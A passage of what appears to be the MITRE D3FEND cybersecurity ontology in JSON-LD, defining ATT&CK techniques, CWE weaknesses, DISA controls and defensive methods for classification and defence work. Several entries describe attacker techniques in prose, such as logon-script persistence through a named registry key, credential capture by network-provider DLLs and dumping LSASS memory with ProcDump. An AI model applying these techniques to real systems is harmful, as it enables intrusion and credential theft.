        "@id": "https://patents.google.com/patent/US20070105445A1"
      },
      "rdfs:label": "Electromagnetic Radiation Hardening",
      "rdfs:subClassOf": {
        "@id": "d3f:RadiationHardening"
      },
      "skos:altLabel": "Electromagnetic Hardening"
    },
    {
      "@id": "d3f:T1636.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1636.003",
      "d3f:definition": "Adversaries may utilize standard operating system APIs to gather contact list data. On Android, this can be accomplished using the Contacts Content Provider. On iOS, this can be accomplished using the `Contacts` framework.",
      "rdfs:label": "Contact List - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1636"
      },
      "skos:prefLabel": "Contact List"
    },
    {
      "@id": "d3f:CWE-415",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-415",
      "d3f:definition": "The product calls free() twice on the same memory address.",
      "d3f:synonym": "Double-free",
      "d3f:weakness-of": {
        "@id": "d3f:MemoryFreeFunction"
      },
      "rdfs:label": "Double Free",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1341"
        },
        {
          "@id": "d3f:CWE-666"
        },
        {
          "@id": "d3f:CWE-825"
        },
        {
          "@id": "_:N0eaa3150e0b74c369bd4f233a17214b3"
        }
      ]
    },
    {
      "@id": "_:N0eaa3150e0b74c369bd4f233a17214b3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryFreeFunction"
      }
    },
    {
      "@id": "d3f:UseCaseStep",
      "@type": "owl:Class",
      "rdfs:label": "Use Case Step",
      "rdfs:subClassOf": {
        "@id": "d3f:Step"
      }
    },
    {
      "@id": "d3f:EmailEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving email communication, including sending, receiving, and processing emails. Email events encapsulate activities essential to the transmission and analysis of email messages in a networked environment.",
      "rdfs:label": "Email Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/email_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationLayerEvent"
        },
        {
          "@id": "d3f:TCPEvent"
        },
        {
          "@id": "_:N0519de053cbb41adad0b4e5d6c912d71"
        }
      ]
    },
    {
      "@id": "_:N0519de053cbb41adad0b4e5d6c912d71",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MailNetworkTraffic"
      }
    },
    {
      "@id": "d3f:CCI-002718_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:FileHashing"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements cryptographic mechanisms to detect unauthorized changes to information.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002718"
    },
    {
      "@id": "d3f:T1106",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1106",
      "d3f:definition": "Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.",
      "d3f:invokes": {
        "@id": "d3f:SystemCall"
      },
      "rdfs:label": "Native API",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutionTechnique"
        },
        {
          "@id": "_:N147077d8d4864e7a8fd23b791af69b0f"
        }
      ]
    },
    {
      "@id": "_:N147077d8d4864e7a8fd23b791af69b0f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemCall"
      }
    },
    {
      "@id": "d3f:EventLogDisableEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event indicating that the event logging service has been disabled, preventing it from collecting or recording logs.",
      "rdfs:label": "Event Log Disable Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EventLogEvent"
        },
        {
          "@id": "_:N2fd6d1d70c8a424d829c023efe860af1"
        }
      ]
    },
    {
      "@id": "_:N2fd6d1d70c8a424d829c023efe860af1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EventLogEnableEvent"
      }
    },
    {
      "@id": "d3f:ControlCorrelationIdentifierCatalog",
      "@type": "owl:Class",
      "d3f:definition": "A control correlation identifier (CCI) catalog provides a catalog of CCIs for a given release date.",
      "rdfs:label": "Control Correlation Identifier Catalog",
      "rdfs:seeAlso": {
        "@id": "https://public.cyber.mil/stigs/cci/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ControlCatalog"
        },
        {
          "@id": "_:Na9595b4a18394580b6c229535a472be8"
        }
      ]
    },
    {
      "@id": "_:Na9595b4a18394580b6c229535a472be8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-member"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CCIControl"
      }
    },
    {
      "@id": "d3f:LocalResource",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computing, a system resource, or simply resource, is any physical or virtual component of limited availability within a computer system. Every device connected to a computer system is a resource. Every internal system component is a resource. Virtual system resources include files (concretely file handles), network connections (concretely network sockets), and memory areas. Managing resources is referred to as resource management, and includes both preventing resource leaks (releasing a resource when a process has finished using it) and dealing with resource contention (when multiple processes wish to access a limited resource).",
      "rdfs:label": "Local Resource",
      "rdfs:seeAlso": {
        "@id": "dbr:System_resource"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Resource"
      },
      "skos:altLabel": "System Resource"
    },
    {
      "@id": "d3f:T1480.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1480.001",
      "d3f:definition": "Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents)",
      "rdfs:label": "Environmental Keying",
      "rdfs:subClassOf": {
        "@id": "d3f:T1480"
      }
    },
    {
      "@id": "d3f:CWE-836",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-836",
      "d3f:definition": "The product records password hashes in a data store, receives a hash of a password from a client, and compares the supplied hash to the hash obtained from the data store.",
      "rdfs:label": "Use of Password Hash Instead of Password for Authentication",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1390"
      }
    },
    {
      "@id": "d3f:DBSCAN",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-DBS",
      "d3f:definition": "A density-based clustering algorithm that works on the assumption that clusters are dense regions in space separated by regions of lower density.",
      "d3f:kb-article": "## References\nAnalytics Vidhya. (2020, September 15). How DBSCAN Clustering Works: A Comprehensive Guide with Implementations in Python. [Link](https://www.analyticsvidhya.com/blog/2020/09/how-dbscan-clustering-works/#:~:text=DBSCAN%20is%20a%20density%2Dbased,points%20into%20a%20single%20cluster.)",
      "rdfs:label": "DBSCAN",
      "rdfs:subClassOf": {
        "@id": "d3f:Density-basedClustering"
      }
    },
    {
      "@id": "d3f:CWE-1095",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1095",
      "d3f:definition": "The product uses a loop with a control flow condition based on a value that is updated within the body of the loop.",
      "rdfs:label": "Loop Condition Value Update within the Loop",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1120"
      }
    },
    {
      "@id": "d3f:CWE-81",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-81",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters that could be interpreted as web-scripting elements when they are sent to an error page.",
      "rdfs:label": "Improper Neutralization of Script in an Error Message Web Page",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-79"
      }
    },
    {
      "@id": "d3f:T1582",
      "@type": "owl:Class",
      "d3f:attack-id": "T1582",
      "d3f:definition": "Adversaries may delete, alter, or send SMS messages without user authorization. This could be used to hide C2 SMS messages, spread malware, or various external effects.",
      "rdfs:label": "SMS Control - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileImpactTechnique"
      },
      "skos:prefLabel": "SMS Control"
    },
    {
      "@id": "d3f:CWE-1051",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1051",
      "d3f:definition": "The product initializes data using hard-coded values that act as network resource identifiers.",
      "rdfs:label": "Initialization with Hard-Coded Network Resource Configuration Data",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1419"
        },
        {
          "@id": "d3f:CWE-665"
        }
      ]
    },
    {
      "@id": "d3f:CCI-000016_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system automatically removes or disables temporary accounts after an organization-defined time period for each type of account.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:AccountLocking"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-13T00:00:00"
      },
      "rdfs:label": "CCI-000016"
    },
    {
      "@id": "d3f:T1218.014",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1218.014",
      "d3f:definition": "Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console (MMC) is a binary that may be signed by Microsoft and is used in several ways in either its GUI or in a command prompt.(Citation: win_mmc)(Citation: what_is_mmc) MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.(Citation: win_msc_files_overview)",
      "d3f:executes": {
        "@id": "d3f:ShellCommand"
      },
      "d3f:may-add": {
        "@id": "d3f:Software"
      },
      "d3f:may-modify": {
        "@id": "d3f:SystemConfigurationDatabase"
      },
      "rdfs:label": "MMC",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1218"
        },
        {
          "@id": "_:N33a9dad3379f46cc9b61dc49db3fabb2"
        },
        {
          "@id": "_:N2c2fb4856b584ba1b2af2ef610907217"
        },
        {
          "@id": "_:N1f82f2bcec3442b181735e288efa802d"
        }
      ]
    },
    {
      "@id": "_:N33a9dad3379f46cc9b61dc49db3fabb2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:executes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ShellCommand"
      }
    },
    {
      "@id": "_:N2c2fb4856b584ba1b2af2ef610907217",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-add"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "_:N1f82f2bcec3442b181735e288efa802d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabase"
      }
    },
    {
      "@id": "d3f:InboundNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Inbound traffic is network traffic originating from another host (client), to the host of interest (server).",
      "rdfs:label": "Inbound Network Traffic",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:DS0014",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A single unit of shared resources within a cluster, comprised of one or more containers",
      "rdfs:comment": "This data source captures events relating to pods and therefore has no direct mappings to digital artifacts.",
      "rdfs:label": "Pod (ATT&CK DS)"
    },
    {
      "@id": "d3f:Grid-basedClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-GBC",
      "d3f:definition": "Divides the entire data space into a finite number of cells reducing the complexity of the data and focuses on the cells rather than the data.",
      "d3f:kb-article": "## References\nTechVidvan. (n.d.). Clustering in Machine Learning Tutorial. [Link](https://techvidvan.com/tutorials/clustering-in-machine-learning/)",
      "rdfs:label": "Grid-based Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:High-dimensionClustering"
      }
    },
    {
      "@id": "d3f:T1556.008",
      "@type": "owl:Class",
      "d3f:attack-id": "T1556.008",
      "d3f:definition": "Adversaries may register malicious network provider dynamic link libraries (DLLs) to capture cleartext user credentials during the authentication process. Network provider DLLs allow Windows to interface with specific network protocols and can also support add-on credential management functions.(Citation: Network Provider API) During the logon process, Winlogon (the interactive logon module) sends credentials to the local `mpnotify.exe` process via RPC. The `mpnotify.exe` process then shares the credentials in cleartext with registered credential managers when notifying that a logon event is happening.(Citation: NPPSPY - Huntress)(Citation: NPPSPY Video)(Citation: NPLogonNotify)",
      "rdfs:label": "Network Provider DLL",
      "rdfs:subClassOf": {
        "@id": "d3f:T1556"
      }
    },
    {
      "@id": "d3f:Reference-LsassProcessDumpViaProcdump_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2019-07-002/"
      },
      "d3f:kb-abstract": "ProcDump is a sysinternal command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike.\n\nProcDump may be used to dump the memory space of lsass.exe to disk for processing with a credential access tool such as Mimikatz. This is performed by launching procdump.exe as a privileged user with command line options indicating that lsass.exe should be dumped to a file with an arbitrary name.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2019-07-002: Lsass Process Dump via Procdump",
      "rdfs:label": "Reference - CAR-2019-07-002: Lsass Process Dump via Procdump - MITRE"
    },
    {
      "@id": "d3f:T1037.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1037.001",
      "d3f:definition": "Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.(Citation: TechNet Logon Scripts) This is done via adding a path to a script to the <code>HKCU\\Environment\\UserInitMprLogonScript</code> Registry key.(Citation: Hexacorn Logon Scripts)",
      "d3f:modifies": {
        "@id": "d3f:UserInitScript"
      },
      "rdfs:label": "Logon Script (Windows)",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1037"
        },
        {
          "@id": "_:N90d2d5dc07214b2d83f6d99e8090b4eb"
        }
      ]
    },
    {
      "@id": "_:N90d2d5dc07214b2d83f6d99e8090b4eb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserInitScript"
      }
    },
    {
      "@id": "d3f:UnixLink",
      "@type": "owl:Class",
      "d3f:definition": "A Unix link is a file link in a Unix file system.",
      "rdfs:label": "Unix Link",
      "rdfs:subClassOf": {
        "@id": "d3f:FileSystemLink"
      }
    },
    {
      "@id": "d3f:ApplicationRule",
      "@type": "owl:Class",
      "d3f:definition": "A configuration of an application which is used to apply logical or data processing functions to data processed by the application.",
      "rdfs:label": "Application Rule",
      "rdfs:subClassOf": {
        "@id": "d3f:ApplicationConfiguration"
      }
    },
    {
      "@id": "d3f:T1213.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1213.003",
      "d3f:definition": "Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.",
      "d3f:reads": {
        "@id": "d3f:CodeRepository"
      },
      "rdfs:label": "Code Repositories",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1213"
        },
        {
          "@id": "_:N50b57e735b964c3fa34738970777edd2"
        }
      ]
    },
    {
      "@id": "_:N50b57e735b964c3fa34738970777edd2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:reads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CodeRepository"
      }
    },
    {
      "@id": "d3f:T1542.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1542.003",
      "d3f:definition": "Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.",
      "d3f:may-modify": [
        {
          "@id": "d3f:BootLoader"
        },
        {
          "@id": "d3f:BootSector"
        },
        {
          "@id": "d3f:VolumeBootRecord"
        }
      ],
      "rdfs:label": "Bootkit",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1542"
        },
        {
          "@id": "_:Na6efbab55ef74dc4a8ad0b98bc5472d9"
        },
        {
          "@id": "_:Ne2ee1aeb753c4938a018d790bc20c006"
        },
        {
          "@id": "_:Nd98f088516a24b9f860580c796420a43"
        }
      ]
    },
    {
      "@id": "_:Na6efbab55ef74dc4a8ad0b98bc5472d9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BootLoader"
      }
    },
    {
      "@id": "_:Ne2ee1aeb753c4938a018d790bc20c006",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BootSector"
      }
    },
    {
      "@id": "_:Nd98f088516a24b9f860580c796420a43",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:VolumeBootRecord"
      }
    },
    {
      "@id": "d3f:T1562.012",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1562.012",
      "d3f:definition": "Adversaries may disable or modify the Linux audit system to hide malicious activity and avoid detection. Linux admins use the Linux Audit system to track security-relevant information on a system. The Linux Audit system operates at the kernel-level and maintains event logs on application and system activity such as process, network, file, and login events based on pre-configured rules.",
      "d3f:disables": {
        "@id": "d3f:KernelAPISensor"
      },
      "rdfs:label": "Disable or Modify Linux Audit System",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1562"
        },
        {
          "@id": "_:N04cf252e66634465b7c790a5fe72b238"
        }
      ]
    },
    {
      "@id": "_:N04cf252e66634465b7c790a5fe72b238",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:disables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:KernelAPISensor"
      }
    },
    {
      "@id": "d3f:T1601",
      "@type": "owl:Class",
      "d3f:attack-id": "T1601",
      "d3f:definition": "Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves.  On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.",
      "rdfs:label": "Modify System Image",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:output-of",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x output-of y: An artifact x is output of an event y iff x must be present when y concludes, was absent in the same state when x began, and y counts as complete only when x is available at its end.",
      "rdfs:domain": {
        "@id": "d3f:Artifact"
      },
      "rdfs:label": "output-of",
      "rdfs:range": {
        "@id": "d3f:Event"
      },
      "rdfs:seeAlso": {
        "@id": "https://www.commoncoreontologies.org/ont00001816"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:participates-in"
      }
    },
    {
      "@id": "d3f:participates-in",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x participates-in y: The object x takes part in the event y, signifying that x contributes to or is affected by the event's occurrence in some way.",
      "rdfs:isDefinedBy": {
        "@id": "http://purl.obolibrary.org/obo/BFO_0000056"
      },
      "rdfs:label": "participates-in",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CWE-1317",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1317",
      "d3f:definition": "The product uses a fabric bridge for transactions between two Intellectual Property (IP) blocks, but the bridge does not properly perform the expected privilege, identity, or other access control checks between those IP blocks.",
      "rdfs:label": "Improper Access Control in Fabric Bridge",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:SystemCallFiltering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SystemCallFiltering"
      ],
      "d3f:d3fend-id": "D3-SCF",
      "d3f:definition": "Controlling access to local computer system resources with kernel-level capabilities.",
      "d3f:filters": {
        "@id": "d3f:SystemCall"
      },
      "d3f:isolates": {
        "@id": "d3f:Process"
      },
      "d3f:kb-article": "## How it works\nSystem call filtering uses a mandatory access control paradigm (that is, a non-discretionary access control) system because the rules and polices that determine access is determined by a security control authority and not distributed to local users. Access determinations are based on designed access control polices and are not based on local resource owner determinations.\n\nAccess is typically granted by defining sets of subjects and sets of objects. Subjects are the entities requesting access and objects are the resources that subjects are trying to access. Rules and policies are defined that associate subjects and object permissions and access controls.\n\n### Common implementations\n#### Security label access control\nA fine-grained form control is to apply security labels to individual resources, including processes, and the access control decisions are against a particular resource and a given user attempting to gain access. This type of control requires that the file system has built-in support for security labels.\n\nAccess controls are typically implemented through the use of label identifiers for every file system object. Identifier labels are applied to resources and users are assigned a similar access identifier. Users attempting to access a resource will result in the operating system performing an access control check. The access control check will compare the assigned user's credentials to that of the resource or object they are attempting to access.\n\nA security context is associated with resources and is used to determine assess. Typical basic access control elements include users, roles and types and together they form a security context which is the basis for the security labels.\n\nThis type of access control is what is employed in SELinux [2]. This form of security kernel access control is considered the most flexible implementation, but it also is the most complex to deploy across the enterprise. Where multiple virtual machines (VM) are run together this type of access control is typically employed to ensure true isolation of processes and VMs.\n\n#### File path level controls\nA less fine-grained form of mandatory access control is to apply security labels that allow for access control at the file path level.  Access control is filesystem agnostic and no relabeling of resources is required. Pathname access control usually seems more natural for implementation and corresponding access audits.\n\nThis type of system call filtering is what is employed in AppArmor [3]. AppArmor was developed to provide a simpler alternative method with much less management overhead. A simple access policy is maintained that defines path resource access rules. Access control attributes are typically associated with programs instead of users.\n\n\n## Considerations\nSome implementations of security label-based control contain complex rules set that are hard to verify and complex to maintain over time.\n\nInitial planning of access model and continuous monitoring of the available users, resources and object is necessary.\n\n## Implementations\n\n * Linux C-Groups, and policy engines like SELinux and AppArmor\n * Windows Mandatory Integrity Control introduced in Windows Vista\n\n\n### Citations\n1. [SELinux](https://selinuxproject.org/)\n2. [AppArmor](https://www.apparmor.net/)",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-AnalysisOfTheWindowsVistaSecurityModel_SymantecCorporation"
        },
        {
          "@id": "d3f:Reference-ArchitectureOfTransparentNetworkSecurityForApplicationContainers_NeuvectorInc"
        },
        {
          "@id": "d3f:Reference-OverviewOfTheSeccompSandbox"
        }
      ],
      "d3f:synonym": "System Call Control",
      "rdfs:label": "System Call Filtering",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AccessMediation"
        },
        {
          "@id": "_:N952284ca80fa46a2b7e480ac00b64b8f"
        },
        {
          "@id": "_:N18fc526a323746e094663049b81a1211"
        }
      ],
      "skos:altLabel": [
        "Mandatory Access Control",
        "System Call Mediation"
      ]
    },
    {
      "@id": "_:N952284ca80fa46a2b7e480ac00b64b8f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:filters"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemCall"
      }
    },
    {
      "@id": "_:N18fc526a323746e094663049b81a1211",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:isolates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:CWE-546",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-546",
      "d3f:definition": "The code contains comments that suggest the presence of bugs, incomplete functionality, or weaknesses.",
      "rdfs:label": "Suspicious Comment",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1078"
      }
    },
    {
      "@id": "d3f:connects",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x connects y: The subject x joins system y by means of communication equipment (to some other system, typically the adversary-targeted host).",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/01071413-v"
      },
      "rdfs:label": "connects",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:UncertaintySampling",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-US",
      "d3f:definition": "Makes the utility inversely proportional to the uncertainty of the model with respect to the sample and will work with any  model provided it can assess its uncertainty of a predection.",
      "d3f:kb-article": "## References\nIntro to Active Learning. inovex Blog.  [Link](https://www.inovex.de/de/blog/intro-to-active-learning/).",
      "rdfs:label": "Uncertainty Sampling",
      "rdfs:subClassOf": {
        "@id": "d3f:ActiveLearning"
      }
    },
    {
      "@id": "d3f:Reference-ContentExtractorAndAnalysisSystem_Bit9Inc,CarbonBlackInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20070028110A1"
      },
      "d3f:kb-abstract": "A security system provides a defense from known and unknown viruses, worms, spyware, hackers, and unwanted software. The system can implement centralized policies that allow an administrator to approve, block, quarantine, and log file activities. The system can extract content of interest from a file container, repackage the content of interest as another valid file type, perform hashes on the content of interest, associate the hash of the container with the hash of the repackaged content, transfer the repackaged content, and store the hash with other security-related information.",
      "d3f:kb-author": "Todd Brennan",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Bit 9 Inc, Carbon Black Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:ExecutableDenylisting"
      },
      "d3f:kb-reference-title": "Content extractor and analysis system",
      "rdfs:label": "Reference - Content extractor and analysis system - Bit 9 Inc, Carbon Black Inc"
    },
    {
      "@id": "d3f:ATTACKICSTactic",
      "@type": "owl:Class",
      "rdfs:label": "ATTACK ICS Tactic",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSThing"
      }
    },
    {
      "@id": "d3f:CWE-163",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-163",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes multiple trailing special elements that could be interpreted in unexpected ways when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Multiple Trailing Special Elements",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-162"
      }
    },
    {
      "@id": "d3f:T1027.006",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1027.006",
      "d3f:creates": {
        "@id": "d3f:JavaScriptBlob"
      },
      "d3f:definition": "Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)",
      "d3f:hides": {
        "@id": "d3f:DigitalArtifact"
      },
      "rdfs:label": "HTML Smuggling",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1027"
        },
        {
          "@id": "_:Nd19b12b6a6d14ebe86dbfff1bf1ce926"
        },
        {
          "@id": "_:Nabdd756d493e403890dd9ab05008715b"
        }
      ]
    },
    {
      "@id": "_:Nd19b12b6a6d14ebe86dbfff1bf1ce926",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:JavaScriptBlob"
      }
    },
    {
      "@id": "_:Nabdd756d493e403890dd9ab05008715b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:hides"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DigitalArtifact"
      }
    },
    {
      "@id": "d3f:WindowsNtTerminateProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "Windows NtTerminateProcess",
      "rdfs:seeAlso": {
        "@id": "https://j00ru.vexillium.org/syscalls/nt/64/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPITerminateProcess"
      }
    },
    {
      "@id": "d3f:CWE-204",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-204",
      "d3f:definition": "The product provides different responses to incoming requests in a way that reveals internal state information to an unauthorized actor outside of the intended control sphere.",
      "rdfs:label": "Observable Response Discrepancy",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-203"
      }
    },
    {
      "@id": "d3f:detects",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x detects y: The entity x discovers the presence, occurrence, or state of entity y through observation or measurement.",
      "rdfs:label": "detects",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:counters"
        },
        {
